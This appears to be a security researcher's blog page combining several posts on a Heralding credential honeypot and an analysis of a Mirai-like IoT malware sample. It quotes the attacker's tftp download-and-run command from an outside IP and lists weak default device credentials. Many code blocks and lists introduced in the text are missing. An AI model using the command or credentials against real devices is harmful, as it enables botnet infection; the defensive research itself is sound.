This is the Definitive Security Data Science and Machine Learning Guide. It includes books, tutorials, presentations, blog posts, and research papers about solving security problems using data science.
Throughout this research, I came across several security related academic and professional research papers on security topics that use Deep Learning as part of their research. What follows is a list of the papers/slides/videos that I found, and these may be useful to others. If you have others that you think should be added to this list, please ping me: @jason_trost.
In a previous post, I discussed some of my experiences with heralding, a credential grabbing honeypot. In this post, I will briefly analyze a sample I obtained from tftp’ing a sample based on heralding log entries. This sample appears to be targetted at MIPS based systems installs that use very weak default creds (root:5up, Admin:5up). There are a few devices that I could find that uses these creds. There are likely many more.
In my previous post I mentioned that I was not able to download a sample from the tftp commands. Well today, I was finally able to download one of the samples via tftp without it timing out.
According to 3 AVs on Virustotal, 3f3863996071b4f32ca8f8e1bfe27a45 is Mirai, BUT the IPs performing the telnet scans only attempted 2 username/password combinations (and the Mirai source code uses many more so this may be a new variant or something completely different).
Here are the IPs observed trying to get my honeypot to download and execute this specific sample (via “tftp -l 7up -r 7up -g 22.214.171.124”).
Switch back to the tcpdump terminal, and kill it. Also, and this is very important, kill the “qemu-mips 7up” processes. The 7up sample immediately starts scanning port 23 at a high rate so you don’t want it running very long.
As you can see from the pcap, we were able to extracted a couple of IOCs:
Privacy protected so kind of a dead end.
Not privacy protected and linked with some Mirai activity (see below). Also of note is the Registrant City which is “fastflux”, kind of funny.
Searching for the registrant email, dlinchkravitz[@]gmail[.]com, turns up these blog posts:
In this post, I am just outlining some details from trying out a relatively new honeypot named Heralding, developed by the well known Honeynet Project developer, Johnny Vestergaard.
Heralding is a designed to simply catch login attempts over several different protocols and subsequent activities. It supports the following protocols:
Heralding logs its data as CSV when logged to files or JSON if logged via ZMQ.
Each record contains the following fields:
Local CSV file
JSON over ZMQ
This is my recommended installation steps. I usually use python virtualenv in order to keep the install isolated from the rest of my environment.
Running this command will allow you to run the honeypot and test the config you just created (config is loaded from current working directory or it uses the default config).
You should see output like this:
When deploying honeypots, I prefer to use supervisord to manage the auto starting/stopping/restarting the sensor upon reboots and failures. So here is how I have deployed heralding:
Check the status:
I ran just one instance of heralding for ~10 hours and caught 3077 events (mostly login attempts), all over telnet. My raw log file can be downloaded here. Here are some stats about what this sensor saw.
After reviewing the logs closer, it appears that all of the “enable” and “shell” usernames and “system” and “sh” passwords are not username/passwords, but instead, they are commands that are attempted after the attacker attempts to login with one of the following sets of creds. These are well known IoT default creds and most of them are embedded in the Mirai scanner source code.
Another IoT related pattern I observed was what appear to be busybox default creds being used to login, download a payload via tftp, and execute it. Unfortunately, I have not be able to download any of the payload files yet, they all timeout.
Malicious login attempts are very common, esp with IoT devices shipping with hardcoded credentials. Heralding makes collecting these login attempts easy since it is a simple, but effective honeypot for capturing credentials attempted over a variety of different protocols.
Heralding is implemented in python and because of its modular logger design, it would be relatively straightforward to add MHN support for this honeypot, so if time permits I might do this.
If you wanted to explore the data collected by my instance of heralding, you can download my log file here: here.
Lastly, consider donating to the Honeynet Project: